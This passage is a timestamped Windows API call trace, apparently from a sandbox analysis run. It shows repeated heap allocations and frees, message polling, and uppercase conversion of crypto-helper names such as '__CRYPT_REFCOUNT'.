(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0255.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0255.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0255.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0255.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0255.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0255.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0255.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0255.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0255.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0255.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0255.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0255.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0255.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0255.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0255.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0255.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0255.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0255.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0255.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0255.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0255.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0255.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0255.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0255.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0255.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0255.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0255.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0255.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc6f8) returned 0x2e7f320 [0255.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0255.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0255.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0255.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0255.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0255.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0255.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0255.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0255.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0255.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0255.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0255.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0255.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc6f8) returned 0x2e8ba20 [0255.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0255.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0255.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0255.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0255.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0255.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0255.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0255.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0255.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0255.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0255.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0255.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0255.923] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0255.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0255.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0255.923] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0255.923] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0255.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0255.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0255.923] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0255.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0255.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0255.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0255.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51730 [0255.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0255.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0255.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0255.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51850 [0255.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0255.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0255.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0255.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0255.924] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0255.924] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0255.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0255.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0255.924] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0255.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0255.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516a0 [0255.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0255.925] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0255.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0255.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0255.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0255.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0255.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0255.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0255.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0255.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0255.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0255.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0255.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0255.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0255.925] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0255.925] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0255.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0255.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0255.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0255.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0255.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0255.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0255.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0255.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0255.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0255.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0255.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc6f8) returned 0x2e7f320 [0255.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0255.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc6f8) returned 0x2e98120 [0255.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0255.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0255.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0255.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0255.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0255.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0255.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0255.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0255.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc6f8) returned 0x2e7f320 [0255.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e98120 | out: hHeap=0x970000) returned 1 [0255.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0255.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0255.928] RtlAllocateHeap 